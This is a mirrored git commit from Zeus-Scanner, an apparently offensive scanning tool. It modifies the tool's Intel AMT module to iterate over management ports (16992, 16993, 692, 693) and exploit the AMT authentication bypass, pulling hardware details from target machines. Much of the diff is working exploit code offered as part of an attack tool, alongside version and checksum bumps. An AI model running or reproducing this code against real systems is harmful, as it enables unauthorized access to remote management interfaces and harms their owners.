mirror of
https://github.com/Ekultek/Zeus-Scanner.git
synced 2026-03-11 08:55:51 +00:00
patch for a reported issue (private) will now successfully search through the ports that may contain the AMT exploitable bypass
This commit is contained in:
parent
55836461ea
commit
46930fd19c
4 changed files with 62 additions and 73 deletions
|
|
@ -1,4 +1,4 @@
|
|||
8885c0c94d4e4adfdc9b5f66c508a7e2 ./zeus.py
|
||||
913ce06f47d730817768c6d434bccad9 ./zeus.py
|
||||
4b32db388e8acda35570c734d27c950c ./etc/scripts/launch_sqlmap.sh
|
||||
6ad5f22ec4a6f8324bfb1b01ab6d51ec ./etc/scripts/cleanup.sh
|
||||
155c9482f690f1482f324a7ffd8b8098 ./etc/scripts/fix_pie.sh
|
||||
|
|
@ -48,10 +48,10 @@ d41d8cd98f00b204e9800998ecf8427e ./lib/attacks/whois_lookup/__init__.py
|
|||
629f935edac35716cf0cb3548f0cc86c ./lib/attacks/xss_scan/__init__.py
|
||||
27358f26bda30d7356143c3ea1fa99c5 ./lib/attacks/nmap_scan/__init__.py
|
||||
216999fa0e84866d5c1d96d5676034e4 ./lib/attacks/nmap_scan/nmap_opts.py
|
||||
be3bcc949bb54e19c5b349c78a575c8c ./lib/attacks/intel_me/__init__.py
|
||||
a0b5265f235a266f7a48874c3d1e08f9 ./lib/attacks/intel_me/__init__.py
|
||||
1faa2b5dfad6eb538bbfe42942d2a9da ./lib/core/errors.py
|
||||
d41d8cd98f00b204e9800998ecf8427e ./lib/core/__init__.py
|
||||
5fcc4e1ddd394c1b4839025562fbc9d9 ./lib/core/settings.py
|
||||
30112312eefcb5444d7916fb8f78142a ./lib/core/settings.py
|
||||
d41d8cd98f00b204e9800998ecf8427e ./var/google_search/__init__.py
|
||||
e9f1e2624154401840b0b118216ba82e ./var/google_search/search.py
|
||||
d41d8cd98f00b204e9800998ecf8427e ./var/__init__.py
|
||||
|
|
|
|||
|
|
@ -14,7 +14,7 @@ from lxml import html
|
|||
from var.auto_issue.github import request_issue_creation
|
||||
|
||||
|
||||
def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs):
|
||||
def __get_auth_headers(target, port, **kwargs):
|
||||
"""
|
||||
get the authorization headers from the URL
|
||||
"""
|
||||
|
|
@ -24,20 +24,12 @@ def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs):
|
|||
logger.info(set_color(
|
||||
"header value not established, attempting to get bypass..."
|
||||
))
|
||||
for port in ports:
|
||||
try:
|
||||
if verbose:
|
||||
logger.debug(set_color(
|
||||
"trying on port {}...".format(port), level=10
|
||||
))
|
||||
source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
|
||||
'connection': 'close', 'user-agent': agent
|
||||
}, proxies=proxy)
|
||||
return source
|
||||
except Exception:
|
||||
pass
|
||||
source = requests.get("http://{0}:{1}/index.htm".format(target, port), timeout=10, headers={
|
||||
'connection': 'close', 'user-agent': agent
|
||||
}, proxies=proxy)
|
||||
return source
|
||||
# Get digest and nonce and return the new header
|
||||
if 'WWW-Authenticate' in source.headers:
|
||||
elif 'WWW-Authenticate' in source.headers:
|
||||
logger.info(set_color(
|
||||
"header value established successfully, attempting authentication..."
|
||||
))
|
||||
|
|
@ -56,36 +48,27 @@ def __get_auth_headers(target, ports=(16992, 16693, 693, 692), **kwargs):
|
|||
return None
|
||||
|
||||
|
||||
def __get_raw_data(target, page, agent=None, proxy=None, **kwargs):
|
||||
def __get_raw_data(target, page, port, agent=None, proxy=None, **kwargs):
|
||||
"""
|
||||
collect all the information from an exploitable target
|
||||
"""
|
||||
possible_ports = (16992, 16993, 693, 692)
|
||||
verbose = kwargs.get("verbose", False)
|
||||
logger.info(set_color(
|
||||
"attempting to get raw hardware information..."
|
||||
))
|
||||
for port in possible_ports:
|
||||
try:
|
||||
if verbose:
|
||||
logger.debug(set_color(
|
||||
"trying on port {}...".format(port), level=10
|
||||
))
|
||||
return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page),
|
||||
headers={
|
||||
'connection': 'close',
|
||||
'Authorization': __get_auth_headers(target, verbose=verbose),
|
||||
'user-agent': agent
|
||||
}, proxies=proxy)
|
||||
except Exception:
|
||||
pass
|
||||
return requests.get("http://{0}:{1}/{2}.htm".format(target, port, page),
|
||||
headers={
|
||||
'connection': 'close',
|
||||
'Authorization': __get_auth_headers(target, port, verbose=verbose),
|
||||
'user-agent': agent
|
||||
}, proxies=proxy)
|
||||
|
||||
|
||||
def __get_hardware(target, agent=None, proxy=None, verbose=False):
|
||||
def __get_hardware(target, port, agent=None, proxy=None, verbose=False):
|
||||
"""
|
||||
collect all the hardware information from an exploitable target
|
||||
"""
|
||||
req = __get_raw_data(target, 'hw-sys', agent=agent, proxy=proxy, verbose=verbose)
|
||||
req = __get_raw_data(target, 'hw-sys', port, agent=agent, proxy=proxy, verbose=verbose)
|
||||
if not req.status_code == 200:
|
||||
return None
|
||||
logger.info(set_color(
|
||||
|
|
@ -131,6 +114,7 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs):
|
|||
verbose = kwargs.get("verbose", False)
|
||||
proxy = proxy_string_to_dict(proxy) or None
|
||||
agent = agent or DEFAULT_USER_AGENT
|
||||
port_list = (16993, 16992, 693, 692)
|
||||
if do_ip_address:
|
||||
logger.warning(set_color(
|
||||
"running against IP addresses may result in the targets refusing the connection...", level=30
|
||||
|
|
@ -140,7 +124,7 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs):
|
|||
))
|
||||
try:
|
||||
url = replace_http(url)
|
||||
url = socket.gethostbyname(url)
|
||||
url = "http://{}".format(socket.gethostbyname(url))
|
||||
logger.info(set_color(
|
||||
"discovered IP address {}...".format(url)
|
||||
))
|
||||
|
|
@ -153,39 +137,44 @@ def main_intel_amt(url, agent=None, proxy=None, **kwargs):
|
|||
logger.info(set_color(
|
||||
"attempting to connect to '{}' and get hardware info...".format(url)
|
||||
))
|
||||
try:
|
||||
json_data = __get_hardware(url, agent=agent, proxy=proxy, verbose=verbose)
|
||||
if json_data is None:
|
||||
logger.error(set_color(
|
||||
"unable to get any information, skipping...", level=40
|
||||
for port in list(port_list):
|
||||
if verbose:
|
||||
logger.debug(set_color(
|
||||
"trying on port {}...".format(port), level=10
|
||||
))
|
||||
pass
|
||||
else:
|
||||
print("-" * 40)
|
||||
for key in json_data.keys():
|
||||
print("{}:".format(str(key).capitalize()))
|
||||
for item in json_data[key]:
|
||||
print(" - {}: {}".format(item.capitalize(), json_data[key][item]))
|
||||
print("-" * 40)
|
||||
except requests.exceptions.ConnectionError as e:
|
||||
if "Max retries exceeded with url" in str(e):
|
||||
logger.error(set_color(
|
||||
"failed connection, target machine is actively refusing the connection, skipping...", level=40
|
||||
))
|
||||
pass
|
||||
else:
|
||||
logger.error(set_color(
|
||||
"failed connection with '{}', skipping...", level=40
|
||||
))
|
||||
pass
|
||||
except Exception as e:
|
||||
if "Temporary failure in name resolution" in str(e):
|
||||
logger.error(set_color(
|
||||
"failed to connect on '{}', skipping...".format(url), level=40
|
||||
))
|
||||
pass
|
||||
else:
|
||||
logger.exception(set_color(
|
||||
"ran into exception '{}', cannot continue...".format(e), level=50
|
||||
))
|
||||
request_issue_creation()
|
||||
try:
|
||||
json_data = __get_hardware(url, port, agent=agent, proxy=proxy, verbose=verbose)
|
||||
if json_data is None:
|
||||
logger.error(set_color(
|
||||
"unable to get any information, skipping...", level=40
|
||||
))
|
||||
pass
|
||||
else:
|
||||
print("-" * 40)
|
||||
for key in json_data.keys():
|
||||
print("{}:".format(str(key).capitalize()))
|
||||
for item in json_data[key]:
|
||||
print(" - {}: {}".format(item.capitalize(), json_data[key][item]))
|
||||
print("-" * 40)
|
||||
except requests.exceptions.ConnectionError as e:
|
||||
if "Max retries exceeded with url" in str(e):
|
||||
logger.error(set_color(
|
||||
"failed connection, target machine is actively refusing the connection, skipping...", level=40
|
||||
))
|
||||
pass
|
||||
else:
|
||||
logger.error(set_color(
|
||||
"failed connection with '{}', skipping...", level=40
|
||||
))
|
||||
pass
|
||||
except Exception as e:
|
||||
if "Temporary failure in name resolution" in str(e):
|
||||
logger.error(set_color(
|
||||
"failed to connect on '{}', skipping...".format(url), level=40
|
||||
))
|
||||
pass
|
||||
else:
|
||||
logger.exception(set_color(
|
||||
"ran into exception '{}', cannot continue...".format(e), level=50
|
||||
))
|
||||
request_issue_creation()
|
||||
|
|
|
|||
|
|
@ -44,7 +44,7 @@ PATCH_ID = str(subprocess.check_output(["git", "rev-parse", "origin/master"]))[:
|
|||
CLONE = "https://github.com/ekultek/zeus-scanner.git"
|
||||
|
||||
# current version <major.minor.commit.patch ID>
|
||||
VERSION = "1.1.20".format(PATCH_ID)
|
||||
VERSION = "1.1.21.{}".format(PATCH_ID)
|
||||
# colors to output depending on the version
|
||||
|
||||
VERSION_TYPE_COLORS = {"dev": 33, "stable": 92, "other": 30}
|
||||
|
|
|
|||
2
zeus.py
2
zeus.py
|
|
@ -324,7 +324,7 @@ if __name__ == "__main__":
|
|||
elif intel:
|
||||
url = get_true_url(url)
|
||||
return intel_me.main_intel_amt(
|
||||
url, agent=agent_to_use,
|
||||
url, agent=agent_to_use, verbose=opt.runInVerbose,
|
||||
proxy=proxy_to_use, do_ip=opt.runAgainstIpAddress
|
||||
)
|
||||
elif admin:
|
||||
|
|
|
|||
Loading…
Reference in a new issue